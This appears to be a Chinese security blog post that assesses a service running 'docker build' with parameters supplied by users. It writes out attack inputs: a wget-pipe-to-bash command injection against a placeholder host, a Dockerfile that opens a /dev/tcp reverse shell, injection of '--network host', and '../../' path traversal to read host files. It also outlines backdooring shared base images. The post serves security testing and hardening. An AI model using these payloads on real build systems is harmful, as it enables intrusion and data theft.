<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"yoursite.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.8.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="背景业务提供一个功能：根据用户的代码仓库编译镜像，并且管理镜像。 编译镜像时的业务实现类似下面这样，其中image_name_tag、dockerfile_file、dockerfile_path变量都是从外部web入口传入的 1docker build $&amp;#123;DOCKER_BUILD_ARG&amp;#125; -t $&amp;#123;image_name_tag&amp;#125; -f $&amp;#123;d">
<meta property="og:type" content="article">
<meta property="og:title" content="docker build时的安全问题">
<meta property="og:url" content="http://yoursite.com/2021-12-26-%22docker%20build%22%E6%97%B6%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/index.html">
<meta property="og:site_name" content="leveryd的个人博客">
<meta property="og:description" content="背景业务提供一个功能：根据用户的代码仓库编译镜像，并且管理镜像。 编译镜像时的业务实现类似下面这样，其中image_name_tag、dockerfile_file、dockerfile_path变量都是从外部web入口传入的 1docker build $&amp;#123;DOCKER_BUILD_ARG&amp;#125; -t $&amp;#123;image_name_tag&amp;#125; -f $&amp;#123;d">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-12-26T07:33:56.949Z">
<meta property="article:modified_time" content="2022-01-17T15:38:43.886Z">
<meta property="article:author" content="leveryd">
<meta property="article:tag" content="安全测试">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://yoursite.com/2021-12-26-%22docker%20build%22%E6%97%B6%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://yoursite.com/2021-12-26-%22docker%20build%22%E6%97%B6%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/","path":"2021-12-26-\"docker build\"时的安全问题/","title":"docker build时的安全问题"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>docker build时的安全问题 | leveryd的个人博客</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">leveryd的个人博客</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%83%8C%E6%99%AF"><span class="nav-number">1.</span> <span class="nav-text">背景</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%88%91%E7%9A%84%E5%88%86%E6%9E%90"><span class="nav-number">2.</span> <span class="nav-text">我的分析</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">3.</span> <span class="nav-text">总结</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">leveryd</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">58</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">23</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2021-12-26-%22docker%20build%22%E6%97%B6%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="leveryd">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="leveryd的个人博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          docker build时的安全问题
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2021-12-26 15:33:56" itemprop="dateCreated datePublished" datetime="2021-12-26T15:33:56+08:00">2021-12-26</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2022-01-17 23:38:43" itemprop="dateModified" datetime="2022-01-17T23:38:43+08:00">2022-01-17</time>
      </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h1><p>业务提供一个功能：根据用户的代码仓库编译镜像，并且管理镜像。</p>
<p>编译镜像时的业务实现类似下面这样，其中image_name_tag、dockerfile_file、dockerfile_path变量都是从外部web入口传入的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker build $&#123;DOCKER_BUILD_ARG&#125; -t $&#123;image_name_tag&#125; -f $&#123;dockerfile_file&#125; $&#123;dockerfile_path&#125;</span><br></pre></td></tr></table></figure>

<p>如果你是这个业务的研发或者安全测试人员，你觉得这里会产生哪些安全漏洞？</p>
<h1 id="我的分析"><a href="#我的分析" class="headerlink" title="我的分析"></a>我的分析</h1><ul>
<li><p>命令执行</p>
<p>我想大家第一个都会想到”命令执行漏洞”：image_name_tag变量如果用户传入<code>`wget -c http://xxx/x.sh | bash -c`</code>就能执行远程服务器上的脚本，拿到宿主机服务器权限。</p>
<p>如果研发大哥对传入的变量做了黑名单呢(比如判断是否包含<code>$</code>、<code>`</code>)，还有其他安全漏洞吗？</p>
</li>
<li><p>Dockerfile中反弹shell</p>
<p><code>-f $&#123;dockerfile_file&#125;</code>这里Dockerfile的内容是用户可控的，所以也很容易想到：我们可以在Dockerfile中写任意命令，获取到”反弹shell”</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">FROM ubuntu</span><br><span class="line">MAINTAINER Victor Coisne victor.coisne@dotcloud.com</span><br><span class="line">RUN echo &quot;while ((1));do sleep 1;&#x2F;bin&#x2F;sh -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;x.x.x.x&#x2F;xxxx 0&gt;&amp;1;done&quot; &gt;&gt; &#x2F;tmp&#x2F;1.sh    # x.x.x.x&#x2F;xxxx是ip和端口</span><br><span class="line">RUN bash &#x2F;tmp&#x2F;1.sh</span><br></pre></td></tr></table></figure>
<p>在”反弹shell”中我们可以尝试去访问”dockerd服务”所在的宿主机网络，或者宿主机能访问到的网络，然后可以去测试网络中的脆弱服务。</p>
<p>如果研发大哥在这里用iptables对容器和宿主机网络做了隔离，还有其他安全漏洞吗？</p>
</li>
<li><p>用户数据泄漏</p>
<p>Dockerfile中的第一行<code>FROM</code>如果我填写其他用户编译好的镜像名称，是不是有可能读到其他用户镜像呢？</p>
<p>虽然”镜像名称”难猜中，但是这个风险确实是存在的。</p>
<p>如果研发大哥在构建镜像并推送到镜像仓库后，然后用<code>docker rmi</code>清空本地的镜像缓存，就不存在这种风险了，那还有其他安全漏洞吗？</p>
</li>
<li><p>给所有镜像种个后门</p>
<p>image_name_tag是编译后的镜像名，Dockerfile中的第一行<code>FROM</code>指令又需要一个基础镜像，那么是否存在如下可能：A用户使用的基础镜像是B用户build生成。如果存在这个可能，那一个恶意用户build生成带后门的nginx、ubuntu等基础镜像，就可以导致其他用户的生成镜像时都带上后门。</p>
<p>测试后，发现”dockerd服务”默认会使用本地镜像，所以会出现上面的问题。</p>
<blockquote>
<p>  –pull=true|false</p>
<pre><code>    Always attempt to pull a newer version of the image. The default is false.</code></pre>
</blockquote>
<p>如果研发大哥使用了<code>docker build --pull=true</code>每次拉取最新镜像，还有其他安全漏洞吗？</p>
</li>
<li><p>命令参数注入<code>--network host</code></p>
<p>如果传入image_name_tag参数值是<code>xxx --network host</code>,可以达到<code>docker build xxx --network host</code>的效果，配合Dockerfile中反弹shell，可以让shell和”dockerd服务”处于同一个网络。这样iptables对容器和宿主机的网络隔离就不起作用了。</p>
<p>当然你还可以注入<code>--build-arg</code>读宿主机环境变量，或者看看<code>docker build</code>还有没有其他的命令行参数可以拿来利用。</p>
<p>如果研发大哥对参数值判断了，不允许<code>-</code>符号传入呢，还有其他安全漏洞吗？</p>
</li>
<li><p>服务数据泄漏</p>
<p>下面的命令可以把”docker客户端”的<code>/tmp</code>、<code>../../</code>目录下的文件全部拷贝到”编译容器”中，配合Dockerfile中反弹shell，可以在shell中读到”docker客户端”机器上的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker build -f .&#x2F;Dockerfile &#x2F;tmp</span><br><span class="line">docker build -f .&#x2F;Dockerfile ..&#x2F;..&#x2F;</span><br></pre></td></tr></table></figure>

<p>同时你可能需要用.dockersignore文件忽略某些文件或目录，避免一些大文件被拷贝到”编译容器”。</p>
<p>所以如果用户传入dockerfile_path参数为<code>../../</code>这种形式的路径，是可以读到机器上的文件。</p>
<p>如果研发大哥判断用户传入的参数，不允许出现<code>..</code>这种目录跳转，还有其他安全漏洞吗？</p>
<p>emm，反正我想不到其他的攻击点了。</p>
<p>另外我想补充说明一下，docker是一个cs架构的软件，所以在做漏洞利用时需要清楚我们是在谁的网络环境下、读谁的文件（谁指的是客户端还是服务端）</p>
</li>
</ul>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>本文介绍了一个docker相关的安全评估的案例，包括其中的风险点和修复措施，希望你能有点收获。</p>
<p>在做这个评估时，我的感受是：有时候业务评估非常依赖评估人员自身的经验，并且好像没有办法依赖一个方法论(比如stride)评估出所有风险点。</p>
<p>PS：欢迎读者与我讨论、指正文章内容。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95/" rel="tag"># 安全测试</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
            </div>
            <div class="post-nav-item">
                <a href="/2021-12-26-Bash%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1Case/" rel="next" title="Bash代码审计Case">
                  Bash代码审计Case <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">leveryd</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
